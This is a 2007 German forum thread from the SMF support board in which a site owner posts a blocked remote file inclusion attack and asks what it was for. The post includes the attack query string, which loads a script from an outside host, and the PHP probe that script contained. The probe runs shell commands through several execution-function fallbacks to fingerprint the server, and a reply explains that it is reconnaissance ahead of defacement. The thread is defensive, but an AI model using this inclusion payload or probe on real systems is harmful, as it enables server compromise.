Vain teksti | Teksti ja kuvat

Simple Machines Community Forum

SMF Support => Language Specific Support => Hilfe zu SMF (German) => Aiheen aloitti: Nordin - heinäkuu 03, 2007, 07:00:22 AP

Otsikko: Angriff gelockt - was wollte er bezwecken?
Kirjoitti: Nordin - heinäkuu 03, 2007, 07:00:22 AP
Hallo,

mein ctracker (http://www.wupmedia.de/ctracker) hat folgenden Angriff geblockt vieleicht können das die developer gebrauchen um ne eventuelle Lücke zu schließen.

QUERY_STRING: _request=&_request[option]=com_content&_request[itemid]=1&globals=&mosconfig_absolute_path=http://securityjobs.us/xpl/tembak.txt?
HTTP_REFERER: 66.230.197.155

Koodi [Valitse]
<?
$dir = @getcwd();
echo "S4M3K<br>";
$OS = @PHP_OS;
echo "OSTYPE:$OS<br>";
$free = disk_free_space($dir);

if ($free === FALSE) {$free = 0;}

if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";

$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;

function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}

function view_size($size)

{

if (!is_numeric($size)) {return FALSE;}

else

{

  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}

  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}

  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}

  else {$size = $size . " B";}

  return $size;

}

}

exit;



Was wollte der Angreifer damit bezwecken wenn er es geschaft hätte den code einzufügen??
Otsikko: Re: Angriff gelockt - was wollte er bezwecken?
Kirjoitti: ianus - heinäkuu 04, 2007, 09:44:10 AP
Grüße!

Ich hatte so das Gefühl diese Zeilen schon einmal gelesen zu haben..

In einem Beitrag im bot-trap Forum wurde praktisch nach dem identischen code gefragt.
Der Beitrag selbst findet sich unter dem link
ich brauch da mal bitte eine Erklärung... (http://www.bot-trap.de/forum/index.php?topic=7372.0)

Um diesen zu lesen muss man dort angemeldet sein und vielleicht sogar einen Beitrag verfasst haben. Ist aber ein nettes Projekt und Anmeldung ist kosten- und verpflichtungsfrei und dient nur dem Benutzerschutz.

Ich zitiere Mal die Antwort, die aber nur einen kleinen Teil des Themas darstellt.

LainaaNein. Das Script ist "nur" ein Test-Script, um zu schauen, ob der Server Schwächen hat. Lohnt es sich, hier einzubrechen? Ist irgendwo eine Tür oder anderes offen für einen Einbruch hier?

Das Script gibt im besten Fall (eigentlich der "worse case" für Dich!) vier Dinge aus, ungefähr so:

Mic22
OSTYPE:Linux
Free:7.57 GB
uid=1229(deine-domain.de) gid=1056(dubistabc38) groups=1077(dubistabc38)

Das wars. Wenn das so wie oben geklappt hat, kommen andere Scripte ... und wir nennen das im mildesten Fall eine "Defacement Attacke". Wenn nicht, kommt halt der nächste Server woanders im Netz, der geknackt wird ...

Armes WWW!

Hth Paul

Ich habe -leider- keinen Schimmer, hoffe aber, dass es Dir weiter hilft.
Vain teksti | Teksti ja kuvat